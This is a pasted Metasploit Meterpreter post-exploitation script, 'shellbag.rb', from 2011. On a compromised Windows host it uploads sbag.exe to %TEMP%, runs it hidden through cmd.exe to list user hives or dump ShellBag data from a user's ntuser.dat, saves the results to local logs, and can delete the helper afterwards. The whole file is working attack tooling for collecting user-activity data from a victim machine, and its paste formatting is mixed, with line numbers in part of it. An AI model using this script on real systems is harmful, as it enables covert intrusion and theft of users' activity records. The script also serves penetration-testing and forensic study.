metacom

shellbag.rb

Oct 10th, 2011
#
# Meterpreter script that uploads the sbag.exe helper to the target and
# collects ShellBag data from a user's ntuser.dat hive into the local logs.
#
# Author(s): James Fitts and Jason Haddix ++ Josh Grunzweig
#------------------------------------------------------------
################## Variable Declarations ##################

# Host details for the current session; 'Computer' is used to name the
# per-host log directory below.
info = @client.sys.config.sysinfo

# Local path of the helper binary that is pushed to the target.
file = File.join(Msf::Config.install_root, 'data', 'sbag.exe')

# Timestamp suffix appended to the log directory name.
# NOTE: the format is %Y%m%d.%M%S — minutes and seconds, no hour field.
filenameinfo = "_#{::Time.now.strftime('%Y%m%d.%M%S')}"

# Per-host log directory: <log_directory>/scripts/shellbag/<Computer>_<stamp>.
# The computer name comes from the remote host, so it is passed through
# Rex::FileUtils.clean_path before being used as a path component
# (presumably to strip characters that would escape the log tree).
logs = ::File.join(
  Msf::Config.log_directory,
  'scripts',
  'shellbag',
  Rex::FileUtils.clean_path(info['Computer'] + filenameinfo)
)

# Remembered for dump(), which writes its output file here.
@logfol = logs

# Create the log directory and any missing parents.
::FileUtils.mkdir_p(logs)

# Option table. Kept as a class variable so the helper methods defined
# further down (usage) can reach it.
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "This help menu"],
  "-u" => [ false, "Uploads sbag.exe to the C:\\WINDOWS\\TEMP directory"],
  "-l" => [ false, "Lists the user hives available"],
  "-d" => [ true, "Dumps the user hive to a file."],
  "-r" => [ false, "Removes sbag.exe from the system"]
)
  32.  
  33. #-----------------------------------------------------------
  34.  
  35. def usage
  36. print_line("Shellbag Meterpreter Script")
  37. print_line("Usage: shellbag <options>")
  38. print(@@exec_opts.usage)
  39. raise Rex::Script::Completed
  40. end
  41.  
  42. #-----------------------------------------------------------
  43.  
  44. def upload(session, file)
  45. tmp = session.fs.file.expand_path("%TEMP%")
  46. print_status("Uploading sbag.exe ...")
  47. session.fs.file.upload_file("#{tmp}\\sbag.exe","#{file}")
  48. print_status("sbag.exe uploaded as #{tmp}\\sbag.exe ...")
  49. end
  50.  
  51. #-----------------------------------------------------------
  52.  
  53. def list()
  54. print_status("Receiving data...")
  55. tmp = session.fs.file.expand_path("%TEMP%")
  56. r = session.sys.process.execute("cmd.exe /c #{tmp}\\sbag.exe -livehives", nil, {'Hidden' => true,'Channelized' => true})
  57. output = ""
  58. while(d = r.channel.read)
  59. output << d
  60. end
  61. r.channel.close
  62. r.close
  63. return output
  64. end
  65.  
  66. #-----------------------------------------------------------
  67.  
  68. def dump(username)
  69. print_status("Recieving data...")
  70. tmp = session.fs.file.expand_path("%TEMP%")
  71. r = session.sys.process.execute("cmd.exe /c #{tmp}\\sbag.exe \"c:\\documents and settings\\#{username}\\ntuser.dat\"", nil, {'Hidden' => true,'Channelized' => true})
  72. output = ""
  73. while(d = r.channel.read)
  74. output << d
  75. end
  76. r.channel.close
  77. r.close
  78. flname = "#{@logfol}/#{username}.txt"
  79. file_local_write(flname, output)
  80. print_status("Shellbag data successfully dumped to the logs!")
  81. end
  82.  
  83. #-----------------------------------------------------------
  84.  
  85. def remove()
  86. print_status("Removing sbag.exe from the system...")
  87. tmp = session.fs.file.expand_path("%TEMP%")
  88. session.sys.process.execute("cmd.exe /c del #{tmp}\\sbag.exe")
  89. print_status("sbag.exe removed!")
  90. end
  91.  
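################## MAIN ##################

# Action flags set while parsing. Exactly one action runs per invocation,
# chosen in the fixed order upload, list, remove, dump (see the dispatch
# below); the unused hlp counter from the original has been dropped.
upl = false
lst = false
dmp = false
rmv = false
username = nil

@@exec_opts.parse(args) do |opt, _idx, val|
  case opt
  when "-h"
    usage # raises Rex::Script::Completed, so parsing stops here
  when "-u"
    upl = true
  when "-l"
    lst = true
  when "-d"
    dmp = true
    username = val
  when "-r"
    rmv = true
  end
end

if args.empty?
  usage
elsif upl
  upload(session, file)
elsif lst
  print(list)
elsif rmv
  remove
elsif dmp
  dump(username)
end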